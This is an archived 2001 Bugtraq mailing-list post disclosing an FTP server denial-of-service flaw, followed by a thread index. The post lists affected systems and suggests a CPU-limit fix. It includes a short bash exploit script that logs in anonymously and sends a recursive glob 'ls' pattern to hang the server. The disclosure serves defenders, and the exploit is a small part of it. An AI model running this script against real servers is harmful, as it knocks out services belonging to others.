Bugtraq mailing list archives
Multiple-Vendor-FTP-Vuln. (old?)
From: "Enrico Kern" <IphantomI () web de>
Date: Mon, 20 Aug 2001 15:20:35 +0200
Hi, i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = many new Linux-Dist.. When a user logged in in ftp and type the ls command the in.ftpd takes over 90 percent cpu-usage and execute = the command 2 or 3x than the full system hang up. it also works in = console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = in march 01, but it still works so i post it again. affected: RedHat Linux 7.x Linux Mandrake 8.0 SuSE Linux 7.2 FreeBSD 4.3 AiX V 4.3 other? Not vuln.: latest Wu-Ftpd Windows FTP-Server Exploit: #!/bin/bash=20 ftp -n FTP-SERVER<<\end=20 quot user anonymous bin quot pass shitold () bug com ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 end=20 Fix: set cpu-limit for your anonymous user. ------------------------- Enrico Kern www.h07.org _______________________________________________________________________ 1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de IhrName () web de, 8MB Speicher, Verschluesselung - http://freemail.web.de
Current thread:
- Multiple-Vendor-FTP-Vuln. (old?) Enrico Kern (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) jeev (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Scott Dier (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Mike Jakubik (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Bernhard Rosenkraenzer (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Roman Drahtmueller (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Dmitriy Kropivnitskiy (Aug 21)
- <Possible follow-ups>
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Robert van der Meulen (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) E. van Elk (Aug 20)
(Thread continues...)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)